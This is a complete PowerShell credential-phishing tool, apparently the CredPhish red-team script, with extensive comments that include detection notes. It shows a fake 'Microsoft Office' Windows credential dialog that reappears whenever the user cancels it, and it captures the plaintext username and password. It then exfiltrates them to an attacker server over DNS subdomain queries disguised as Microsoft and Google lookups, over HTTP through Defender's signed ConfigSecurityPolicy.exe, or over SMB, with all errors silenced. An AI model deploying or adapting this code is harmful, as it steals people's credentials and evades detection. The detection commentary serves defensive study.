# ---------------------------------------------------------------------------
# Configuration. Every value here is a script-scope variable read by the
# functions and the main section below. Nothing validates them, so a bad value
# only shows up at run time (and silently, once the main section sets
# $ErrorActionPreference to SilentlyContinue).
# ---------------------------------------------------------------------------
# exfil address
# One destination for all three channels: the -Server of every DNS query, the
# host of the HTTP URL, and the server in the SMB UNC path.
$exfilServer = "192.168.56.112"
# prompt
# Text shown in the OS credential picker (set as Caption/Message on the picker
# options in the main section). $targetUser only appears in the message text.
$targetUser = $env:username
$companyEmail = "blackhillsinfosec.com"
$promptCaption = "Microsoft Office"
$promptMessage = "Connecting to: $targetUser@$companyEmail"
$maxTries = 1 # maximum number of prompts that receive a non-empty user name AND password; cancelled/empty prompts are not counted (see the main loop)
$delayPrompts = 2 # seconds slept before each prompt
$validateCredentials = $false # when $true, every non-empty answer is tried as a real logon by testCredentials and the loop stops on the first one that works
# dns
# start dns server in kali: python3 /path/to/credphish/dns_server.py
$enableDnsExfil = $true
$exfilDomains = @('.microsoft.com', '.google.com', '.office.com', '.live.com') # parent domains appended to each hex-encoded label; one is picked at random per query
$randomDelay = get-random -minimum 1 -maximum 10 # evaluated ONCE here, so the gap between DNS queries is a constant 1-9 s for the whole run (a fixed cadence, not per-query jitter)
$subdomainLength = 6 # maximum chars in subdomain. must be an even number between 2-60 or queries may break. invokeDnsExfil assumes 2 hex chars per input char, so roughly half this many plaintext chars go out per query
# http
# start http server in kali: python3 -m http.server 80
$enableHttpExfil = $false
$httpPort = 80
# Wildcard path to Microsoft Defender's ConfigSecurityPolicy.exe. If it resolves,
# invokeHttpExfil runs that signed binary with the URL as its argument instead of
# calling Invoke-WebRequest from PowerShell.
$ConfigSecurityPolicy = "C:\Prog*Files\Win*Defender\ConfigSecurityPolicy.exe"
# smb
# start smb server in kali: impacket-smbserver -smb2support exfilShare ${PWD}
$enableSmbExfil = $false
$shareName = "exfilShare" # must match share in impacket-smbserver (i.e., exfilShare)
$outputFile = "credentials.txt" # filename of exfiltrated credentials
##########################################################################
# Never read anywhere. invokeDnsExfil assigns to $exfilCount, but without a scope
# modifier those assignments create a function-local copy, so this stays 0.
$exfilCount = 0
#######################################
# DNS channel: sends $capturedCreds (script scope, built in the main section) to
# $exfilServer as a series of A-record lookups whose left-most label is the hex
# encoding of a slice of the data.
# Globals read:    $capturedCreds, $exfilDomains, $exfilServer, $randomDelay,
#                  $subdomainLength
# Globals written: none ($exfilCount below is a function-local copy)
# Returns:         nothing; lookup results are discarded and failures are not
#                  detected or retried
# Detection notes: every query names $exfilServer explicitly via -Server instead
# of using the configured resolver; the left-most label is hex-only ([0-9a-f],
# never a real host name); the parent domain is one of $exfilDomains; and the
# queries arrive at the fixed $randomDelay cadence.
#######################################
function invokeDnsExfil(){
# Plaintext slice waiting to be encoded. The nested function reads it from this
# scope through PowerShell's dynamic scoping; it is reset after every flush.
$subdomain = ""
# Hex-encodes the current $subdomain, appends a random parent domain, resolves
# the name against $exfilServer and then sleeps $randomDelay.
function invokeDnsResolve(){
$hex = @()
for($j=0;$j -lt $subdomain.length;$j++){
# "{0:X}" has no width specifier: a char code below 0x10 yields a single hex digit.
$b = "{0:X}" -f ([int]$subdomain[$j])
$hex = $hex + $b
}
$randomDomain = get-random -maximum ($exfilDomains.count)
$exfil = ($hex -join '') + $exfilDomains[($randomDomain)]
# The only outbound action of this channel. The name is lower-cased before sending.
resolve-dnsname $exfil.ToLower() -Type A -Server $exfilServer | out-null
start-sleep -Seconds $randomDelay
}
# Walk $capturedCreds one character at a time and flush whenever the hex form
# (assumed 2 chars per input char) reaches $subdomainLength. Note 0..Length is
# inclusive, so the loop visits Length+1 indexes.
foreach ($c in 0..$capturedCreds.Length){
$subdomain += $capturedCreds[$c]
if (($subdomain.Length * 2) -ge $subdomainLength){
invokeDnsResolve
$subdomain = ""
$exfilCount = 0
}else{
$exfilCount++
}
}
# Flush whatever is left over after the loop.
if ($subdomain) {
invokeDnsResolve
}
}
#######################################
# HTTP channel: places the whole $capturedCreds string, URL-escaped, in the path
# of a plain-http GET to $exfilServer:$httpPort. Because it is http (not https)
# and the data sits in the URL, the credentials are visible in the receiving
# server's access log and to anything on the network path.
# Globals read: $capturedCreds, $exfilServer, $httpPort, $ConfigSecurityPolicy
# Returns:      nothing; the response is discarded and no error is checked
# Detection notes: when Defender's ConfigSecurityPolicy.exe exists it is the
# process that makes the request, with the full URL on its command line;
# otherwise the request comes from the PowerShell host via Invoke-WebRequest.
#######################################
function invokeHttpExfil(){
$httpServer = 'http://' + $exfilServer + ':' + $httpPort + '/' + [uri]::EscapeDataString($capturedCreds)
# test-path resolves the wildcard path defined in the config section.
if (test-path -path $ConfigSecurityPolicy) {
& $ConfigSecurityPolicy $httpServer
}else{
# HTTP method w/ Invoke-WebRequest (lame)
Invoke-WebRequest -UseBasicParsing $httpServer | Out-Null
}
}
#######################################
# SMB channel: writes $capturedCreds as a UTF-8 text file to the UNC path
# \\$exfilServer\$shareName\$outputFile. Nothing checks that the write succeeded.
# Globals read: $capturedCreds, $exfilServer, $shareName, $outputFile
# Returns:      nothing
# Detection notes: an outbound SMB session from the workstation to $exfilServer
# plus a file create/write on a share named $shareName; the file content is the
# plaintext "COMPUTERNAME[user:pass,...]" string built in the main section.
#######################################
function invokeSmbExfil(){
$capturedCreds | Out-File -Encoding utf8 \\$exfilServer\$shareName\$outputFile
}
#######################################
# Checks the most recently entered credentials by actually using them: builds a
# PSCredential from $phish (script scope, set by the main loop) and tries to
# start ipconfig under that identity.
# Globals read: $phish (CredentialUsername / CredentialPassword)
# Returns:      $?, i.e. whether the Start-Process call succeeded
# Detection notes: this is a real logon attempt on the host, so a wrong password
# should surface as a failed logon in the Security log, and a correct one spawns
# ipconfig.exe as a child of the PowerShell host under the entered account.
#######################################
function testCredentials(){
# -AsPlainText -Force: the password is already clear text at this point.
$securePassword = ConvertTo-SecureString -AsPlainText $phish.CredentialPassword -Force
$secureCredentials = New-Object System.Management.Automation.PSCredential($phish.CredentialUsername, $securePassword)
Start-Process ipconfig -Credential $secureCredentials
# $? reflects the Start-Process above. The main section sets $ErrorActionPreference
# to SilentlyContinue before calling this, so a failure does not stop the script.
return $?
}
# ---------------------------------------------------------------------------
# Main section: show the OS credential picker, collect what is typed, then push
# the result out over each enabled channel.
# ---------------------------------------------------------------------------
# Load the WinRT interop assembly and locate the generic AsTask(IAsyncOperation<T>)
# extension method, which is used below to wait synchronously on PickAsync.
Add-Type -AssemblyName System.Runtime.WindowsRuntime
$asTask = ([System.WindowsRuntimeSystemExtensions].GetMethods() | `
? { $_.Name -eq 'AsTask' -and $_.GetParameters()[0].ParameterType.Name -eq 'IAsyncOperation`1' })[0]
# Forces the CredentialPicker WinRT type to load; the cast result is discarded.
# PowerShell loading Windows.Security.Credentials.UI and calling CredentialPicker
# is an unusual combination worth alerting on.
[void][Windows.Security.Credentials.UI.CredentialPicker, Windows.Security.Credentials.UI, ContentType = WindowsRuntime]
$asTask = $asTask.MakeGenericMethod(([Windows.Security.Credentials.UI.CredentialPickerResults]))
# Options for the genuine Windows credential dialog: the window the user sees is
# the operating system's own picker; only caption, message and target name are
# script-chosen.
$opt = [Windows.Security.Credentials.UI.CredentialPickerOptions]::new()
# 0 is AuthenticationProtocol.Basic; this is what makes CredentialPassword come
# back as plain text below. NOTE(review): per the CredentialPicker docs the other
# protocols do not return the password in clear - confirm if changing this.
$opt.AuthenticationProtocol = 0
$opt.Caption = $promptCaption
$opt.Message = $promptMessage
$opt.TargetName = '1'
$count = 0
# From here on non-terminating errors (failed lookups, writes, logons) are
# swallowed and nothing is reported; none of the functions above check for
# errors themselves.
$ErrorActionPreference = 'SilentlyContinue'
[system.collections.arraylist]$harvestCredentials = @()
# Loop until a validated password is found or $count reaches $maxTries.
# $validPassword is only ever assigned when $validateCredentials is $true, so
# otherwise the loop ends on $count alone.
while (!($validPassword -Or $count -eq $maxTries)){
start-sleep -s $delayPrompts
# Show the picker and block until the user answers or cancels (AsTask(...).Result).
$phish = $asTask.Invoke($null, @(([Windows.Security.Credentials.UI.CredentialPicker]::PickAsync($opt)))).Result
# Recorded before the empty check, so a cancelled/empty answer still adds a
# (mostly empty) "user:pass" entry to the list.
[void]$harvestCredentials.Add($phish.CredentialUsername + ':' + $phish.CredentialPassword)
# An empty user name or password also skips $count++, so cancelling the dialog
# does not count toward $maxTries and the prompt comes straight back.
if (!($phish.CredentialPassword) -Or !($phish.CredentialUsername)){
Continue
}
if ($validateCredentials){
$validPassword = testCredentials
}
$count++
}
# Everything captured, tagged with the host name: COMPUTERNAME[user:pass,user:pass,...]
$capturedCreds = $env:computername + '[' + ($harvestCredentials -join ',') + ']'
# Each enabled channel sends the same string; failures are silent because of the
# $ErrorActionPreference setting above.
if ($enableDnsExfil){
invokeDnsExfil
}
if ($enableHttpExfil){
invokeHttpExfil
}
if ($enableSmbExfil){
invokeSmbExfil
}